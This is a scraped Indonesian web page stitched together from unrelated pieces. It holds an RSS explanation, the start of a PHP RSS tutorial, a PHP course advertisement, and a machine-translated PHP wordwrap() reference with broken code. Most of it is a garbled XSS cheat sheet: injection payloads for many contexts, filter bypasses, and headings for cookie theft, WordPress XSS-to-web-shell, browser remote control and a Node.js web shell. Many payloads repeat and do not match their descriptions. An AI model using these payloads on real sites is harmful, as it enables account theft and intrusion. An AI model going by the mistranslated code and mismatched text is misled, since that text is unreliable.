RSS adalah sebuah file berformat XML untuk indikasi yang telah digunakan (di antaranya dan kebanyakan) situs web berita dan weblog. Singkatan ini biasanya mengarah ke beberapa
Ringkasan Situs Kaya (RSS 0. 91)
Ringkasan Situs RDF (RSS 0. 9 dan 1. 0)
Sindikasi Sangat Sederhana (RSS 2. 0)
Teknologi yang dibangun dengan RSS pengumuman kita untuk berlangganan ke situs web yang menyediakan umpan web (feed) RSS, biasanya situs web yang isinya selalu diganti secara reguler. Untuk memanfaatkan teknologi ini kita membutuhkan layanan pengumpul. Pengumpul bisa dibayangkan sebagai kotak surat pribadi. Kita kemudian bisa mendaftar ke situs yang ingin kita tahu perubahannya. Namun, berbeda dengan langganan koran atau majalah, untuk berlangganan RSS tidak perlu biaya, gratis.
Pada kesempatan ini kami akan memberikan tutorial bagaimana cara membuat RSS FEED dengan mudah menggunakan PHP RSS ini di anjurkan untuk kalian yang mempunya web blog, portal berita dll agar user bisa berlangganan informasi terbaru dari website kalian, untuk itu kita pelajari bersama-sama bisa lihat dibawah ini untuk tahap-tahap pembuatanya
1. Silahkan buat database dengan nama test dan buat 1 tabel dengan nama post seperti diwah ini ya
NamaJenisidint (8)titlevarchar (90)contenttextpublishedtimestampPrimary Key (id) AUTO_INCREMENT2. Sekarang isi konten postnya terserah anda mau di isi apa
3. Silahkan buat folder terserah kalian pada htdocs saya beri contoh folder demo
4. Sekarang anda buka editor kalian masing masing dan buatlah file dengan format. PHP saya berikan contoh index. php dan simpan pada folder yang tadi kita buat
Paket Kursus PHP Platinum seharga Rp 7. 000. 000 dan dengan membeli paket kursus ini anda hanya perlu membayar Rp5. 000. 000
Kami Baba Studio telah berdiri selama lebih dari 17 tahun dengan lebih dari 130 Ribu murid dan alumni. Beberapa penawaran Baba Studio adalah
1. Peraih Ratusan Penghargaan
2. Termasuk 5 ICT Award dari Menkominfo
Tentang materi
Sebelum mengambil paket PHP Platinum ini anda wajib mengetahui bahasa pemograman HTML & CSS dan Javascript
Jika anda awam, kami sarankan ambil paket Website Developer Platinum (Full Stack) yang sudah lengkap dari HTML CSS sampai ke PHP
Hasil yang didapat dari kursus ini
Detail materi yang akan anda pelajari.
- Dasar PHP
- Membuat Database dengan MySQL Workbench (Pemula hingga Mahir)
- Dapat membuat website company profile dengan PHP Native
- Dapat membuat website E-Commerce dengan PHP Framework Laravel beserta di dalamnya ada payment dan gateway menggunakan API
❮ Referensi String PHP
Contoh
Bungkus string menjadi garis baru saat mencapai panjang tertentu
$str = "Contoh kata yang panjang adalah. Superkalifragulistik";
gema bungkus kata($str,15,"
\n");
?>
Definisi dan Penggunaan
Fungsi wordwrap() membungkus string menjadi baris baru ketika mencapai panjang tertentu
catatan. Fungsi ini dapat menyisakan spasi putih di awal baris
Sintaksis
bungkus kata (string, lebar, pecah, potong)
Nilai Parameter
ParameterDeskripsistringDiperlukan. Menentukan string untuk dipecah menjadi lineswidthOptional. Menentukan lebar garis maksimum. Standarnya adalah 75breakOptional. Menentukan karakter untuk digunakan sebagai istirahat. Standarnya adalah "\n"cutOptional. Menentukan apakah kata-kata yang lebih panjang dari lebar yang ditentukan harus dibungkus- SALAH - Default. tanpa bungkus
- BENAR - Bungkus
rincian teknis
Nilai Pengembalian. Mengembalikan string yang dipecah menjadi baris saat berhasil, atau FALSE saat gagal. Versi PHP. 4. 0. 2+log perubahan. Parameter cut ditambahkan di PHP 4. 0. 3Lebih Banyak Contoh
Contoh
Menggunakan semua parameter
$str = "Contoh kata yang panjang adalah. Superkalifragulistik";
gema bungkus kata($str,15,"
\n",BENAR);
?>
Contoh
Bungkus string menjadi baris baru
$str = "Contoh kata yang panjang adalah. Superkalifragulistik";
echo bungkus kata($str,15);
?>
Keluaran HTML dari kode di atas adalah (Lihat Sumber)
Contoh dari a
kata yang panjang adalah
supercalifragulistic
Output browser dari kode di atas adalah
Contoh kata panjang adalah. supercalifragulistic
Cobalah sendiri "❮ Referensi String PHPyang dijelaskan dalam kasus berikutnya. Tambahkan "->" ke payload jika input masuk dalam komentar HTML
<svg onload=alert(1)> "><svg onload=alert(1)>Konteks HTML - Injeksi Tag Blokir
Gunakan saat input masuk ke dalam atau di antara opening / opening tag dalam tanda kurung berikut
________satu_______Konteks HTML - Injeksi Sebaris
Gunakan saat input masuk ke dalam nilai atribut dari tag HTML tetapi tag itu tidak bisa
diakhiri dengan lebih dari tanda (>)
"onmouseover=alert(1) // "autofocus onfocus=alert(1) //Konteks HTML - Injeksi Sumber
Gunakan ketika input ditempatkan sebagai nilai dari tag atribut HTML berikut. href, src, data atau
aksi (memainkan formulasi). Attribute Src dalam tag skrip dapat berupa URL atau "data. , waspada(1)"
javascript:alert(1)Konteks Javascript - Injeksi Kode
Gunakan ketika input ditempatkan di blok skrip, di dalam nilai string yang dibatasi
Konteks Javascript - Injeksi Kode dengan Escape Bypass
Gunakan ketika input ditempatkan di blok skrip, di dalam string yang dibatasi nilai tetapi tanda kutip
lolos dengan garis miring terbalik
\\'-alert(1)//Konteks Javascript - Injeksi Tag
Gunakan saat input ditempatkan di mana saja dalam blok skrip
</script><svg onload=alert(1)> Xss LanjutanKonteks Javascript - Injeksi Kode di Blok Logis
Gunakan muatan pertama atau kedua ketika input masuk dalam blok skrip, di dalam nilai yang dibatasi string dan
di dalam satu blok logis seperti fungsi atau kondisional (if, else, etc). jika kutipan lolos
backslash, gunakan payload ketiga
'}alert(1);{' '}alert(1)%0A{' \\'}alert(1);{//Konteks Javascript - Injeksi Kode Tanpa Kutipan
Gunakan saat ada multi refleksi di baris kode JS yang sama. Muatan 1 bekerja di JS sederhana
variable dan 2 bekerja di objek JS non-objects
-alert(1)//\\ -alert(1)}//\\ _Konteks Javascript - Injeksi Placeholder dalam Templat Literal
Gunakan saat input masuk ke dalam string backticks (``) yang dibatasi atau di mesin template
${alert(1)} _Refleksi Multi dalam Konteks HTML - Refleksi Ganda (Masukan Tunggal)
Gunakan untuk memanfaatkan banyak refleksi pada halaman yang sama
(<title><style><script><textarea><noscript><pre><xmp>dan<iframe>)(</tag> adalah demikian). ========================================================================================== </tag><svg onload=alert(1)> "></tag><svg onload=alert(1)> _0Refleksi Multi dalam Konteks HTML - Refleksi Tiga (Masukan Tunggal)
Gunakan untuk memanfaatkan banyak refleksi pada halaman yang sama
(<title><style><script><textarea><noscript><pre><xmp>dan<iframe>)(</tag> adalah demikian). ========================================================================================== </tag><svg onload=alert(1)> "></tag><svg onload=alert(1)> _1Refleksi Multi Input (Ganda & Tiga) dalam Konteks HTML
Gunakan untuk memperoleh keuntungan dari beberapa masukan refleksi pada halaman yang sama. Mainkan berguna dalam HPP (HTTP
Parameter Pollution) skenario, di mana ada refleksi untuk parameter berulang. ketiga
payload menggunakan refleksi yang dipisahkan koma dari parameter yang sama
(<title><style><script><textarea><noscript><pre><xmp>dan<iframe>)(</tag> adalah demikian). ========================================================================================== </tag><svg onload=alert(1)> "></tag><svg onload=alert(1)> _2Injeksi Pengunggahan File – Nama file
Gunakan saat nama file yang diunggah tercermin di suatu tempat di halaman target
(<title><style><script><textarea><noscript><pre><xmp>dan<iframe>)(</tag> adalah demikian). ========================================================================================== </tag><svg onload=alert(1)> "></tag><svg onload=alert(1)> _3Injeksi Pengunggahan File – Metadata
Gunakan ketika file metadata yang diunggah tercermin di suatu tempat di halaman target. itu menggunakan
baris perintah exiftool ("$" adalah terminal prompt) dan setiap bidang metadata dapat disetel
(<title><style><script><textarea><noscript><pre><xmp>dan<iframe>)(</tag> adalah demikian). ========================================================================================== </tag><svg onload=alert(1)> "></tag><svg onload=alert(1)> _4Injeksi Pengunggahan File – File SVG
Gunakan untuk membuat XSS tersimpan sesuai target saat mengunggah file gambar. Simpan konten di bawah ini sebagai
"xss. svg"
(<title><style><script><textarea><noscript><pre><xmp>dan<iframe>)(</tag> adalah demikian). ========================================================================================== </tag><svg onload=alert(1)> "></tag><svg onload=alert(1)> _5Injeksi Sisipkan DOM
Gunakan untuk menguji XSS ketika dimasukkan ke DOM sebagai markup yang valid alih-alih menjadi
tercermin dalam kode sumber. Ini berfungsi untuk kasus di mana tag skrip dan vektor lainnya tidak akan berfungsi
(<title><style><script><textarea><noscript><pre><xmp>dan<iframe>)(</tag> adalah demikian). ========================================================================================== </tag><svg onload=alert(1)> "></tag><svg onload=alert(1)> _6Injeksi Sisipkan DOM – Permintaan Sumber Daya
Gunakan ketika kode javascript halaman memasukkan ke dalam halaman hasil permintaan ke URL
dikontrol oleh penyerang (injeksi)
(<title><style><script><textarea><noscript><pre><xmp>dan<iframe>)(</tag> adalah demikian). ========================================================================================== </tag><svg onload=alert(1)> "></tag><svg onload=alert(1)> _7Injeksi PHP_SELF
Gunakan ketika URL saat ini digunakan oleh kode PHP yang diatur target sebagai nilai atribut dari
Bentuk HTML, misalnya. Suntikkan antara ekstensi php dan mulai bagian permintaan (?) Menggunakan a
garis miring terdepan (/)
(<title><style><script><textarea><noscript><pre><xmp>dan<iframe>)(</tag> adalah demikian). ========================================================================================== </tag><svg onload=alert(1)> "></tag><svg onload=alert(1)> _8Injeksi Skrip - Tanpa Tag Penutup
Gunakan ketika ada tag skrip penutup () di suatu tempat dalam kode setelah refleksi
(<title><style><script><textarea><noscript><pre><xmp>dan<iframe>)(</tag> adalah demikian). ========================================================================================== </tag><svg onload=alert(1)> "></tag><svg onload=alert(1)> _9Javascript postMessage() Injeksi DOM (dengan Iframe)
Gunakan ketika ada pendengar acara "weigh" seperti di "window. addEventListener('pesan',. )"
dalam kode javascript tanpa pemeriksaan asal. Target harus dapat dibingkai (X-Frame
Pilihan tajuk sesuai konteks). Simpan sebagai file HTML (atau menggunakan data. teks/html) yang disediakan
TARGET_URL beri INJEKSI (vector XSS atau payload)
"onmouseover=alert(1) // "autofocus onfocus=alert(1) // 0XSS Berbasis XML
Gunakan untuk menyuntikkan vektor XSS dalam halaman XML (type konten teks / xml atau aplikasi / xml)
Tambahkan "->" ke payload jika input masuk di bagian komentar atau "]]>" jika input masuk a
Bagian "CDATA"
"onmouseover=alert(1) // "autofocus onfocus=alert(1) // 1Suntikan AngularJS (v1. 6 dan lebih tinggi)
Gunakan ketika ada perpustakaan AngularJS dimuat di halaman, di dalam blok HTML dengan ng-app
directive (payload pertama) atau buat milik Anda sendiri (yang kedua)
"onmouseover=alert(1) // "autofocus onfocus=alert(1) // 2Injeksi CRLF
Gunakan saat aplikasi memantulkan input di salah satu respons header, memungkinkan injeksi
Karakter Pengembalian Carriage (%0D) memberikan Line Feed (%0A). Vector untuk Gecko dan Webkit,
masing-masing
________23Vektor Universal XSS pada gulungan
Gunakan untuk XSS tanpa interaksi pengguna saat menggunakan pengendali event onscroll. ini bekerja dengan
alamat, blockquote, body, center, dir, div, dl, dt, form, li, menu, ol, p, pre, ul, dan h1 ke h6
HTML-tag
"onmouseover=alert(1) // "autofocus onfocus=alert(1) // _4XSS di SSI
Gunakan saat ada injeksi Server-Side Include (SSI)
"onmouseover=alert(1) // "autofocus onfocus=alert(1) // 5Ketik Juggling
Gunakan untuk melewati kondisi "jika" yang cocok dengan angka dalam perbandingan longgar
"onmouseover=alert(1) // "autofocus onfocus=alert(1) // 6XSS Berbasis Kesalahan SQLi
Gunakan di titik akhir di mana pesan kesalahan SQL dapat dipicu (dengan kutipan atau garis miring terbalik)
"onmouseover=alert(1) // "autofocus onfocus=alert(1) // 7Bootstrap XSS Vektor
Gunakan ketika ada perpustakaan bootstrap hadir di halaman. Itu memainkan memori Auditor Webkit, adil
klik di mana saja di halaman untuk memicu. Karakter apa pun dari nilai href dapat dikodekan dalam HTML, bypass
filter
"onmouseover=alert(1) // "autofocus onfocus=alert(1) // _8Pemberitahuan Peramban
Gunakan alternatif untuk mengingatkan, meminta, dan mengonfirmasi popup. Itu membutuhkan penerimaan pengguna (1 st
payload) tetapi begitu pengguna telah mengotorisasi sebelumnya untuk situs itu, yang ke-2 dapat digunakan
"onmouseover=alert(1) // "autofocus onfocus=alert(1) // _9# memotong filter
Campuran Kasus XSS
Gunakan untuk mem-bypass filter case-sensitive
javascript:alert(1) 0Tag Tidak Tertutup
Gunakan dalam kelebihan HTML untuk menghindari pemfilteran di bawah kedua () batch. Dibutuhkan asli yang lebih ciuman dari kode sumber masuk setelah input
refleksi
javascript:alert(1) 1XSS huruf besar
Gunakan saat aplikasi mencerminkan input dalam ciuman huruf. Ganti "&" dengan "%26" dan "#" dengan
"%23" ucapkan URL
javascript:alert(1) 2Konten Ekstra untuk Tag Skrip
Gunakan saat filter mencari "" atau "" ke payload jika input
ditempatkan di bagian komentar atau "]]>" jika input ditempatkan di bagian "CDATA"
</script><svg onload=alert(1)> _1Konteks Javascript - Injeksi Tag (Webkit Bypass)
Gunakan untuk memotong Auditor Webkit dalam konteks javascript dengan keluar dari blok skrip
</script><svg onload=alert(1)> _2Refleksi Ganda Dengan Input Tunggal (Webkit Bypass)
Gunakan untuk meminta Auditor Webkit dalam skenario refleksi ganda untuk konteks apa pun
</script><svg onload=alert(1)> _3Vektor untuk PHP Arrays Dump (Webkit Bypass)
Gunakan ketika refleksi berasal dari penggunaan fungsi PHP var_dump() dan print_r(). "P" adalah
sewa parameter
</script><svg onload=alert(1)> _4Konteks Javascript - Injeksi Kode (IE11/Edge Bypass)
Gunakan untuk mem-bypass Microsoft IE11 atau Edge saat menyuntikkan ke dalam konteks javascript
</script><svg onload=alert(1)> _5Konteks HTML - Injeksi Tag (IE11/Edge XSS Bypass)
Gunakan untuk mem-bypass filter asli mereka dalam skenario multi-refleksi
</script><svg onload=alert(1)> _6XSS Berbasis DOM - Penghindaran Filter Wastafel Lokasi
Gunakan saat filter mencari "https. // DOMAIN" dalam string yang digunakan untuk menjual
dokumen properti. lokasi. Itu juga menyalahgunakan face string "Javascript" dapat dibangun
</script><svg onload=alert(1)> _7Vektor dengan Penangan Peristiwa Agnostik yang Kurang Dikenal
Penangan acara yang dapat digunakan dengan tag nama yang berubah-ubah. Namun perlu diingat bahwa menggunakan
nama tag yang ada seperti "" sedang difilter, ganti "r =>" atau "w =>" untuk
"fungsi()"
=> Berbasis HTML
(responses harus berupa HTML dengan tajuk Akses-Kontrol-Bolehkan-Asal (CORS))
'}alert(1);{' '}alert(1)%0A{' \\'}alert(1);{// 0Wordpress XSS ke RCE (v5. 0. 3)
Gunakan itu sebagai skrip jarak jauh untuk dijalankan ketika admin Wordpress mendapat XSSed untuk membuat web shell
Plugin "Hello Dolly" adalah target di sini (terlepas dari aktivasi) tetapi hampir semua plugin lainnya
dapat digunakan, mengubah file dan jalur yang sesuai (termasuk "wordpress" sebagai root WP)
'}alert(1);{' '}alert(1)%0A{' \\'}alert(1);{// 1=> Jalankan perintah shell web di terminal seperti berikut ("id" sebagai contoh)
'}alert(1);{' '}alert(1)%0A{' \\'}alert(1);{// 2Mailer XSS Buta
Gunakan sebagai skrip remote XSS blind yang menyimpan file PHP dan ubah $menjadi dan $header header
demikian. Diperlukan server surat yang berfungsi seperti Postfix
'}alert(1);{' '}alert(1)%0A{' \\'}alert(1);{// 3Penyematan XSS Asing Tak Terlihat
Gunakan untuk memuat XSS dari domain lain (atau subdomain) ke domain saat ini. Dibatasi oleh
tajuk target X-Frame-Options (XFO). Contoh peringatan di bawah ini dalam konteks brutelogic. com. br
terlepas dari domain
'}alert(1);{' '}alert(1)%0A{' \\'}alert(1);{// 4Pencurian kue
Gunakan untuk mendapatkan semua cookie dari pengguna korban yang ditetapkan oleh situs target. Cookie tidak dapat dilindungi oleh
http Hanya bendera keamanan. Enkode "+" sebagai "%2B" di URL
'}alert(1);{' '}alert(1)%0A{' \\'}alert(1);{// 5Deface Virtual Sederhana
Gunakan untuk mengubah bagaimana situs akan muncul ke korban menyediakan kode HTML. Dalam contoh di bawah ini a
Timbang "Tidak Ditemukan" ditampilkan
'}alert(1);{' '}alert(1)%0A{' \\'}alert(1);{// 6Kontrol Jarak Jauh Peramban
Gunakan untuk menghubungkan browser dan mengirim perintah javascript ke dalamnya secara interaktif. Gunakan javascript
kode di bawah ini bukannya peringatan (1) dalam injeksi Anda dengan terminal seperti Unix yang terbuka dengan
mengikuti skrip shell (pendengar). Berikan HOST sebagai nama host, alamat IP, atau domain ke
menerima perintah dari mesin penyerang
'}alert(1);{' '}alert(1)%0A{' \\'}alert(1);{// 7=> Pendengar (perintah terminal)
'}alert(1);{' '}alert(1)%0A{' \\'}alert(1);{// _8Jangan berikan. kerangka web js
Gunakan untuk membuat web shell di aplikasi Node. js yang sewa. Setelah menjalankan payload di bawah ini
gunakan shell dengan face berikut. http. // sasaran. 5855/? . js_command
Contoh untuk pop calc. cmd = membutuhkan('proses_anak'). Exec('kalkulator gnome')
'}alert(1);{' '}alert(1)%0A{' \\'}alert(1);{// _9Kebocoran Token HTMLi
Gunakan ketika XSS tidak memungkinkan tetapi beberapa HTML yang diinjeksi mungkin terjadi. Itu akan memeras apa pun
token anti-CSRF (atau nilai rahasia lainnya) yang mungkin ada di antara berbasis musim panas
refleksi dan kutipan tunggal berikutnya dalam kode asli. Berikan HOST dengan skrip untuk meraih
parameter token atau periksa log server. Terlepas dari contoh di bawah ini,